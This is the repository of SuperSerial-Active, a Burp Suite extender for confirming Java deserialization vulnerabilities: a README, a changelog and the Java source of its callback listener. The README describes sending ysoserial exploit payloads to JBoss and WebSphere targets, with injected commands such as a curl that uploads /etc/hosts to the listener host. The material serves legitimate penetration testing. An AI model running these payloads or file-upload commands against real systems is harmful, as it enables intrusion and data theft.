README.md
# SuperSerial-Active
SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender

See Blog: https://www.directdefense.com/superserial-active-java-deserialization-active-identification-burp-extender/

To help our customers and readers definitively identify Java Deserialization vulnerabilities, we have created an additional Burp Suite Extender called “SuperSerial-Active” to compliment our previous release of "SuperSerial-Passive" (https://github.com/DirectDefense/SuperSerial) . Unlike the previous extender, which only passively identifies potential instances of Java deserialization vulnerabilities, this extender actively attempts to exploit the vulnerability in a non-intrusive way. This results in the confirmed identification of a deserialization vulnerability. The exploitation is made possible by making use of the ysoserial library (https://github.com/frohoff/ysoserial). The Extender currently tests only against target systems running the JBoss or WebSphere platforms, but can detect the vulnerability on both Linux and Windows systems running JBoss or WebSphere. Support for detecting the vulnerability on systems running other platforms will be added in future releases of the extender.

## Extender Overview
SuperSerial-Active consists of two components, an extender to be loaded into Burp Suite Professional (superserial-active-[VERSION].jar) and a standalone web server Node (SuperSerial Node) written entirely in Java (SuperSerialNode-[VERSION].jar). The extender works by sending a request containing a serialized object exploit payload (generated by ysoserial) from the Burp Suite Active Scanner to the target system. The payload contains an operating system command that is intended to be executed by the target system (both Linux and Windows commands are attempted), specifically to have the target system access the SuperSerial Node via HTTP, or upload a local file to the SuperSerial Node via HTTP. After sending the exploit payload, the extender then communicates with the SuperSerial Node via HTTP to determine whether the Node was accessed by the target system, or if a file was uploaded by the target system. If the Node communicates that either of these events has taken place, the extender then creates a new Scan Issue in Burp Suite to confirm the vulnerability to the user.

## Extender Configuration/Usage:

1. Decide where the SuperSerial Node will be hosted.

	* the Node must be accessible directly by the target system (if target system is internet-facing, the node must be hosted with an internet-facing IP address or registered domain name).

	* the Node can be hosted on the same machine that is running Burp Suite, as long as the target system can access it directly.

	* the system running the Node must have Java Runtime Environment 7 or higher installed.

2. Download the SuperSerialNode-[VERSION].jar file on this system.

3. In a terminal, launch the SuperSerial Node:

	* The Node listens on port 15050 by default. To have the Node listen on another port, include the command-line argument --port=[PORT] where [PORT] specifies what port the Node will listen on (ex. java -jar SuperSerialNode.jar --port=8090).
	
	* All access to the Node is controlled by requiring all client requests to contain an authentication token GUID as a URL parameter (token=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX). This GUID is either generated at runtime or is specified by the user as a command-line argument (--token=[TOKEN]), and is outputted to the console immediately when the Node is started.
	
	* After termination, the Node does not remove any files that are created for storing uploaded files and access entries. By including the --resume command-line parameter, the Node can "resume" from previous executions and re-create contexts used successfully during these times.
	
4. The Node will print some information to the console after it has successfully launched. Take note of the Node Authentication Token that is printed to the terminal.
	
5. On the system running Burp Suite, download the latest superserial-active-[VERSION].jar and ysoserial-master-SNAPSHOT.jar files.

6. In the Extender->Options tab in Burp, check if the Java Environment Settings option is set.

	a. If the option is unset, create a new directory on the system and place the ysoserial-master-SNAPSHOT.jar file in this directory. Set the option to this newly-created directory
	
	b. If the option is already set, place the ysoserial-master-SNAPSHOT.jar file in the directory set in the option.

7. Load the superserial-active-[VERSION].jar file into Burp in the Extender->Extensions tab. The SuperSerial-Active extender will be loaded but will need to be configured before it can be used.

8. Configure the SuperSerial Node connection settings in the SuperSerial->"Node Connection Settings" tab.

	a. Set the Node Host. It must be set as the domain name or IP address that the target system will use to access the Node

		* Note: If the Node is hosted on the same machine as burp is running, the Node Host must be set to the IP address of this machine, NOT TO 127.0.0.1!

	b. Set the Node Port (the port the Node is listening on)

	c. Set the Node Token, which was printed to the console of the SuperSerial Node when it was launched.

	d. Click "Test Connection" and verify that the status pane indicates a successful connection, or change the settings based on the status pane message.

9. Configure Active Scan settings in the SuperSerial->"Scan Settings" tab.

	a. If desired, set the "Scan All" setting to scan all request parameters during active scanning.
		
		* WARNING: This will GREATLY increase the overall scan time per URL. Only enable this setting if needed.
	
	b. Configure download attempts and wait time:

		* After sending the serialized object exploit payload the extender accesses the node a maximum number of tries (5 by default), waiting a specified amount of time between each try (1.5 seconds by default).
		* Setting low values will allow the Active Scanner to finish more quickly but will increase the likelyhood of failing to detect the vulnerability, therefore higher values are recommended.
	
	c. Enable/Disable the desired ysoserial payload types
	
	d. Review the operating system commands listed that will be used during Active Scanning.
		
		* Additional commands can be added to the list that will be used during scanning. In order to detect the vulnerability, the added command must force the target system to access the Node via HTTP:
			* Commands can be autopopulated with node connection values using the following pre-defined tokens: [NODEHOST], [NODEPORT], [NODEPROTOCOL], [NODEPATH], [NODETOKEN]
			* ex. curl -X PUT --data-binary @/etc/hosts [NODEPROTOCOL]://[NODEHOST]:[NODEPORT][NODEPATH]?token=[NODETOKEN] will be automatically converted during scanning to: curl -X PUT --data-binary @/etc/hosts http://192.168.1.1:15050/FFFFFFFFFF?token=ABCDEF12-3456-7890-ABCD-EF1234567890
		* Commands are used during active scanning in the order they are listed in the table (top to bottom).
		* Commands that are intended to access the Node (but not upload a file) must also include the URL parameter 'write=true' (curl [NODEPROTOCOL]://[NODEHOST]:[NODEPORT][NODEPATH]?token=[NODETOKEN]&write=true)
	
10. Change filters in the Proxy and Target tabs to display "Other Binary". This will ensure any Scan Issues created by the extender will be displayed to the user.

11. Perform an active scan against any suspected vulnerable URLs. Additionally, the user can view the console output of the SuperSerial Node during the scan to view messages indicating any communication with the Node as it occurs, as well as to diagnose any potential issues. Any exceptions encountered by the extension during scanning (such as when generating payloads) will be printed to the Extender->Errors tab.

12. If a vulnerability is detected by the SuperSerial-Active extender, a new "Java Deserialization Vulnerability" Scan Issue will be created in Burp Suite. 

## Extender Dependencies:

* ysoserial (for creating serialized object exploit payloads): https://github.com/frohoff/ysoserial (supported versions: >=0.0.3)

* JSON for Java (for properly creating and parsing JSON in extender and Node): https://github.com/douglascrockford/JSON-java (included in release superserial-active-[VERSION].jar and SuperSerialNode-[VERSION].jar files, version 20160212 at time of writing)

## Extender Building Instructions:
Requires Java Development Kit 7 or higher

1. Choose folder to use for building (these instructions will use c:\test)

2. Create the following directories (case-sensitive):

	* c:\test\api
	
	* c:\test\build-extender
	
	* c:\test\build-node
	
3. Download the SuperSerial-Active master source zip and extract to directory c:\test (SuperSerial-Active-master directory and sub-directories will be created)

4. Download the Burp Extender interface files

	a. Launch Burp Suite and navigate to the Extender->APIs tab
	
	b. Click 'Save interface files' button
	
	c. In the save prompt, navigate to the c:\test\api directory and click 'Save'
	
5. Create directory (case sensitive): c:\test\api\org

6. Download the latest "JSON for Java" source code .zip file (https://github.com/douglascrockford/JSON-java/releases) and extract to directory: c:\test\api\org

7. Rename the newly extracted directory (JSON-java-[version]) to (case-sensitive): json

8. Copy all contents of the c:\test\api directory into: c:\test\SuperSerial-Active\Extender, overwrite any duplicate files

9. Copy all contents of the c:\test\api into: c:\test\SuperSerial-Active\Node, overwrite any duplicate files

10. Remove folder c:\test\api, it is no longer needed

11. Download the latest ysoserial (https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar) release jar to c:\test

12. To build the SuperSerial-Active Extender, do the following (this will create file c:\test\superserial-active.jar):

	a. In a terminal window, navigate to c:\test
	
	b. execute command: javac -cp ysoserial-master-SNAPSHOT.jar -d build-extender -sourcepath SuperSerial-Active-master/Extender SuperSerial-Active-master/Extender/burp/\*.java SuperSerial-Active-master/Extender/superserial/settings/\*.java SuperSerial-Active-master/Extender/superserial/ui/\*.java
	
	c. execute command: jar vcf superserial-active.jar -C build-extender . -C SuperSerial-Active-master/Extender licenses/JSON-LICENSE.txt
	
14. To build the SuperSerial Node, do the following (this will create file c:\test\SuperSerialNode.jar):

	a. In a terminal window, navigate to c:\test
	
	b. execute command: javac -d build-node -sourcepath SuperSerial-Active-master/Node SuperSerial-Active-master/Node/superserial/node/\*.java
	
	c. execute command: jar vcfm SuperSerialNode.jar SuperSerial-Active-master/Node/MF.TXT -C build-node . -C SuperSerial-Active-master/Node JSON-LICENSE.txt


## Disclaimer:
This software is only intended to be used against systems the user explicitly owns or has authorization to test/attack. The developers provide the software for free without warranty, and assume no responsibility for any damage caused to systems by misusing the software. It is the responsibility of the user to abide by all local, state and federal laws while using the software.

## License:
Extender written by Jeff Cap
Copyright (C) 2015, 2016 DirectDefense, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/


CHANGELOG.md
# Change Log

## [0.5.0.1] (2016-11-22)
### Fixed
- Extender: minor bugfix in NodeScannerCheck.java to prevent scan from failing with all payload types enabled.

## [0.5] (2016-11-21)
### Added
- Extender: Support for vulnerability detection using Burp Collaborator (HTTP only, HTTPS and DNS not yet supported)
- Extender: include parameter name in "Issue Detail" when payload is submitted via a paramter (ex. WebSphere)
- Extender: Support for including the ysoserial payload type in the detection command
- Extender: highlight index generation via InsertionPoint classes.
- Extender: Separate class specifically for generating ysoserial payloads (to be used by all Burp tools)
- Extender: Option in "Connection Settings" tab for Burp Collaborator or SuperSerial Node
- Extender: Warning of connection to outdated SuperSerial Node
- Extender: "Select All" and "Select None" buttons in "Scan Settings" tab for ysoserial payload types
- Node: Support for accepting the name of the ysoserial payload type via URL parameter (technique)

### Fixed
- Node: Resume capability now saves upload time, upload source, and ysoserial payload type name correctly.

### Changed
- Extender: Changed version number to 0.5
- Extender: Changed title of detected issue(s) to "Java Deserialization Remote Code Execution"
- Extender: Changed default detection commands to include the ysoserial payload type in the requests
- Extender: "Issue Remediation" section now includes links to actual remediation solutions.
- Node: Changed version number to 0.5

### Removed
- Extender: Single general ScanIssue class (SerializationRCEExploitIssue.java), replaced by general abstract parent class and specific sub-classes

## [0.4.0.1] (2016-11-11)
### Fixed
- Node: Standardized all message printouts

### Changed
- README.md: Updated ysoserial URL

## [0.4] (2016-7-27)
### Added
- Extender: Support for >=ysoserial-0.0.3
- Extender: Configuration checkboxes under "Scan Settings" to enable/disable ysoserial payload types
- Extender: Checking version of connected SuperSerial Node (via heartbeat request) and displaying in SuperSerial->"Node Connection Settings" tab
- Extender: Removal of generated context on Node (via DELETE request) after active scan where no vulnerability is identified
- Node: Include version information in responses to heartbeat requests
- Node: Output when context is removed (via DELETE request)
- Node: Token command line argument: use inputted token as authentication token
- Node: Resume capability: execute node and re-create contexts from previous executions by reading temporary files; enabled via --resume command line option
- Node: Help printout describing different command-line arguments

### Fixed
- Extender: Commands table in SuperSerial->"Scan Settings" tab can now be repopulated after all commands have been removed.
- Node: class imports in SuperSerialNodeHelper class (changed from * to specific classes)

### Changed
- Extender: Updated JSON for Java to version 20160212
- Node: Updated JSON for Java to version 20160212
- Node: Format of command-line arguments (--arg=val)
- Node: Message included in responses to heartbeat requests (South Park quote)
- Node: Filename format for temporary files storing uploaded files (SuperSerial-UF-[NODEPATH].tmp) and access entries (SuperSerial-AE-[NODEPATH].tmp)
- Node: Moved bytes-to-hex converstion method to SuperSerialNodeHelper class
- README.md: Updated Extender Description
- README.md: Updated Extender Overview
- README.md: Updated Extender Configuration/Usage (Node command-line arguments, loading ysoserial via Burp settings, enabling/disabling payload types, adding/editing commands)
- README.md: Updated Extender Dependencies
- README.md: Updated Extender Building Instructions
- CHANGELOG.md: Updated

### Removed
- Extender: Requirement to recompile ysoserial and package it with the Extender (Extender/ysoserial/GeneratePayload.java)
- Extender: ysoserial license (due to above) (Extender/licenses/YSOSERIAL-LICENSE.TXT)

## [0.3.1] (2016-5-3)
### Fixed
- Node: Uploaded file/access entries now saved to correct directory on *nix systems.

### Changed
- CHANGELOG.md: Updated

## [0.3] (2016-3-10)
### Fixed
- Node: Standardized output of failed requests ("XXX request denied ...")

### Added
- Extender: Sub-tabs "Node Connection Settings" and "Scan Settings" Under SuperSerial tab.
- Extender: Setting (under SuperSerial->"Scan Settings") to automatically active scan all listed (by Burp) request parameters and JBoss insertion point when performing Active Scan.
- Extender: Allow users to add new or edit/delete existing operating system commands used during Active Scan (under SuperSerial->"Scan Settings").
- Extender: Allow users to re-arrange the order that operating system commands are testing during Active Scan.
- Node: Allow users to remove dynamically-generated contexts by sending DELETE request to context.

### Changed
- Extender: Moved all Node connection configuration settings to SuperSerial->"Node Connection Settings" sub-tab.
- Extender: Moved all Active Scan settings to SuperSerial->"Scan Settings" sub-tab.
- README.md: Updated build procedure
- CHANGELOG.md: Updated

## [0.2.1] (2016-1-25)
### Fixed
- Node: IP Address printout (now displaying the correct IPs when files/access entries are downloaded).

### Added
- Node: printouts now preceded by timestamps
- README.md: build procedure

### Changed
- Node: Uploaded files/access entries are now saved to [TMP]/SuperSerial directory rather than [TMP] directory.
- Node: Uploaded files/access entries are now written to files named "SuperSerial-[CONTEXT_PATH].tmp".
- README.md: Updated license
- CHANGELOG.md

## [0.2] (2015-12-30)
### Added
- CHANGELOG.md
- Extender: Support for active detection against Linux and Windows systems running WebSphere.
- Extender: Logic to create platform-based insertion points only under certain conditions, rather than automatically be default.

### Changed
- README.md: Include latest description.


Node/superserial/node/SuperSerialNode.java
/*
	SuperSerialNode.java
	
	v0.4 (7/27/2016)
	
	Node for SuperSerial Active Scan check to use. The active scan check will first make a GET request to the /queue context which will create a new custom
	context (SuperSerialNodeHttpHandler.java) with a randomly-generated path, which will be returned in a JSON object in the response. The Active Scan check 
	will then attempt to force the target system to access the path and either write an access entry or upload a local file. The Active Scan check will then 
	attempt to download the access entry or uploaded file to confirm the presence of a vulnerability. All access is controlled by requiring all client 
	requests to contain a randomly-generated authentication token GUID as a URL parameter. This GUID is either generated at runtime or is specified by the user 
	as a command-line argument, and is outputted to the console immediately when the node is started. This token must be entered into the SuperSerial-Active 
	Scan Settings menu for the check to properly function. Command line arguments are availble to: print a help dialog, choose a port (other than the default 
	15050) for the Node to bind to, choose an authentication token for use (rather than using a runtime-generated one), and whether to try resuming from 
	previous execution(s).
*/

package superserial.node;

import com.sun.net.httpserver.HttpServer;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.Headers;
import java.net.URI;
import java.net.InetSocketAddress;
import java.io.File;
import java.io.OutputStream;
import java.io.IOException;
import java.util.Hashtable;
import java.util.ArrayList;
import java.util.Iterator;
import java.security.SecureRandom;
import org.json.JSONObject;

public class SuperSerialNode {
	private HttpServer hs;
	private int port;
	private boolean https;
	private String token;
	private SecureRandom sr;
	private String dir;
	
	private static final String VERSION = "0.5";
	private static final int DEFAULT_PORT = 15050;
	
	public SuperSerialNode(int p,String tk,boolean rs) {
		https=false;
		hs = null;
		if((p>=1) && (p<=65535)) {
			port = p;
		} else {
			System.err.println("Invalid port "+Integer.toString(p)+" specified: falling back to default port "+Integer.toString(DEFAULT_PORT));
			port = DEFAULT_PORT;
		}
		try {
			hs = HttpServer.create(new InetSocketAddress(port),0);
		} catch(IOException e) {
			e.printStackTrace();
			return;
		}
		sr = new SecureRandom();
		token = tk;
		if(token == null) token = generateGUID();
		
		//create directory to store uploaded files/access entries (if not already created)
		dir = System.getProperty("java.io.tmpdir")+System.getProperty("file.separator")+"SuperSerial"+System.getProperty("file.separator");
		File targetDir = new File(dir);
		if(!targetDir.exists()) {
			targetDir.mkdir();
		}
		
		hs.createContext("/queue",new QueueHandler());
		hs.createContext("/heartbeat",new HeartbeatHandler());
		
		//if --resume option is specified, re-create previously-generated contexts
		if(rs) {
			System.err.print("Attempting to resume from previous execution: ");
			File[] prevFiles = targetDir.listFiles();
			if(prevFiles.length>0) {
				ArrayList<String> foundContextList = new ArrayList<String>();
				for(int i=0;i<prevFiles.length;i++) {
					String filename = prevFiles[i].getName();
					String[] fNameSplit = filename.split("\\.",2);
					if(fNameSplit.length==2) {
						if(fNameSplit[1].equals("tmp")) {
							fNameSplit = fNameSplit[0].split("-");
							if(fNameSplit.length==3 && fNameSplit[0].equals("SuperSerial")) {
								boolean uploaded = false;
								String path = fNameSplit[2];
								switch(fNameSplit[1]) {
									case "UF":
										uploaded = true;
										break;
									case "AE":
										break;
									default:
										continue;
								}
								
								if(path.length()==10) { //TODO: validate complete format of path name
									path = "/"+path;
									hs.createContext(path,new SuperSerialNodeHttpHandler(token,path,dir,uploaded));
									foundContextList.add(path);
								}
							}
						}
					}
				}
				
				if(foundContextList.size()==0) {
					System.err.println("No previous executions detected\n");
				} else {
					System.err.print("\n");
					Iterator<String> contextItr = foundContextList.iterator();
					while(contextItr.hasNext()) {
						System.err.println("Context "+contextItr.next()+" created from previous execution");
					}
					System.err.print("\n");
				}
			} else {
				System.err.println("No previous executions detected\n");
			}
		}
		
		
		hs.start();
	}
	
	private void printSessionInfo() {
		System.err.println("SuperSerial Node v"+VERSION);
		System.err.println("Uploaded File/Access Entry Directory: "+dir);
		System.err.println("Node started on HTTP"+(https ? "S" : "")+" port "+port);
		System.err.println("Node Authentication Token for this session: "+token);
	}
	
	//dynamically create new context when requested
	private void createContext(String path) {
		if(path.charAt(0)!='/') path = "/"+path;
		hs.createContext(path,new SuperSerialNodeHttpHandler(token,path,dir));
	}
	
	private String generateGUID() {
		String retVal = generateRandom(16);
		return retVal.substring(0,8)+"-"+retVal.substring(8,12)+"-"+retVal.substring(12,16)+"-"+retVal.substring(16,20)+"-"+retVal.substring(20);
	}
	
	private String generateShortRandom() {
		return generateRandom(5);
	}
	
	private String generateRandom(int l) {
		byte[] buffer = new byte[l];
		sr.nextBytes(buffer);
		return SuperSerialNodeHelper.bytesToHex(buffer);
	}
	
	//handler for /queue context: create new context when requested, return path to created context JSON body (requires authentication token GUID)
	private class QueueHandler implements HttpHandler {
		public void handle(HttpExchange exchange) {
			try {
				OutputStream os = null;
				if(exchange.getRequestMethod().equalsIgnoreCase("GET")) {
					URI uri = exchange.getRequestURI();
					String clientToken = null;
					
					Hashtable<String,String> urlParams = SuperSerialNodeHelper.parseURLParams(uri.getQuery());
					if((urlParams!=null) && urlParams.containsKey("token")) {
						clientToken = urlParams.get("token");
					}
					
					if(token.equalsIgnoreCase(clientToken)) { //valid request: create handler and return URL
						exchange.getRequestBody().close();
						String context = "/"+generateShortRandom();
						createContext(context);
						JSONObject jsonObj = new JSONObject();
						jsonObj.put("path",context);
						String jsonReturn = jsonObj.toString(); //return newly created path as JSON parameter
						Headers respHeaders = exchange.getResponseHeaders();
						respHeaders.add("Content-Type","application/json");
						exchange.sendResponseHeaders(200,jsonReturn.length());
						os = exchange.getResponseBody();
						os.write(jsonReturn.getBytes());
						os.flush();
						os.close();
						SuperSerialNodeHelper.printLogEntry("Queue request from "+exchange.getRemoteAddress().getHostString()+" succeeded, "+context+" context added!");
					} else {
						SuperSerialNodeHelper.printLogEntry("Queue request from "+exchange.getRemoteAddress().getHostString()+" denied (wrong authentication token)");
						exchange.sendResponseHeaders(401,-1);
						os = exchange.getResponseBody();
						os.close();
					}
				} else {
					SuperSerialNodeHelper.printLogEntry("Queue request from "+exchange.getRemoteAddress().getHostString()+" denied (wrong HTTP method)");
					exchange.sendResponseHeaders(405,-1);
					os = exchange.getResponseBody();
					os.close();
				}
			} catch(IOException ioe) {
				ioe.printStackTrace();
			}
		}
	}
	
	//handler for /heartbeat context: check connection to node (requires authentication token GUID)
	private class HeartbeatHandler implements HttpHandler {
		public void handle(HttpExchange exchange) {
			try {
				//Headers reqHeaders = exchange.getRequestHeaders();
				URI uri = exchange.getRequestURI();
				String clientToken = null;
				
				Hashtable<String,String> urlParams = SuperSerialNodeHelper.parseURLParams(uri.getQuery());
				if((urlParams!=null) && urlParams.containsKey("token")) {
					clientToken = urlParams.get("token");
				}
				
				if(token.equalsIgnoreCase(clientToken)) { //valid request: return HTTP 200 to confirm that connection was successful
					JSONObject jsonObj = new JSONObject();
					jsonObj.put("message","They got attacked by Manbearpig and Manbearpig leaves no one alive, I\'m SuperSerial!");
					jsonObj.put("version",VERSION);
					String jsonReturn = jsonObj.toString(); //return newly created path as JSON parameter
					Headers respHeaders = exchange.getResponseHeaders();
					respHeaders.add("Content-Type","application/json");
					exchange.sendResponseHeaders(200,jsonReturn.length());
					OutputStream os = exchange.getResponseBody();
					os.write(jsonReturn.getBytes());
					os.flush();
					os.close();
					SuperSerialNodeHelper.printLogEntry("Heartbeat request from "+exchange.getRemoteAddress().getHostString()+" succeeded");
				} else {
					exchange.sendResponseHeaders(401,-1);
					exchange.getResponseBody().close();
					SuperSerialNodeHelper.printLogEntry("Heartbeat request from "+exchange.getRemoteAddress().getHostString()+" denied (wrong authentication token)");
				}
			} catch(IOException ioe) {
				ioe.printStackTrace();
			}
		}
	}
	
	public static void main(String[] args) {
		//parse command-line arguments
		int p = DEFAULT_PORT;
		String tk = null;
		boolean resume = false;
		if(args.length>0) {
			for(int i=0;i<args.length;i++) {
				args[i] = args[i].trim();
				String[] paramSplit = args[i].split("=",2);
				switch(paramSplit[0]) {
					case "--help":
						System.err.println("Usage: java -jar SuperSerialNode.jar [--help] [--port=[PORT]] [--token=[TOKEN]] [--resume]");
						System.err.println("--help: you\'re looking at it");
						System.err.println("--port=[PORT]: run the SuperSerial Node on port [PORT] (default: 15050)");
						System.err.println("--token=[TOKEN]: run the SuperSerial Node with authentication token [TOKEN] (format: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX)");
						System.err.println("--resume: during initialization, recreate any contexts from previous executions by polling current list of temporary files");
						return;
					case "--port":
						if(paramSplit.length==2) {
							try {
								p = Integer.parseInt(paramSplit[1]);
							} catch(Exception e) {
								System.err.println("Invalid port \'"+paramSplit[1]+"\' specified: falling back to default port "+Integer.toString(DEFAULT_PORT));
							}
						} else {
							System.err.println("Incomplete Option: "+args[i]+", falling back to default port "+Integer.toString(DEFAULT_PORT));
						}
						break;
					case "--token":
						if(paramSplit.length==2) {
							if(!paramSplit[1].matches("^[a-fA-F0-9\\-]*$")) { //check for correct chars. TODO: update regex to validate 8-4-4-4-12 GUIDs
								System.err.println("Supplied token "+paramSplit[1]+" in wrong format, using runtime-generated token");
							} else {
								tk = paramSplit[1];
							}
						} else {
							System.err.println("Incomplete Option: "+args[i]+", using runtime-generated token");
						}
						break;
					case "--resume":
						resume = true;
						break;
					default:
						System.err.println("Unrecognized Option: "+args[i]);
						break;
				}
			}
		}
		
		SuperSerialNode node = null;
		node = new SuperSerialNode(p,tk,resume);
		node.printSessionInfo();	
	}
}
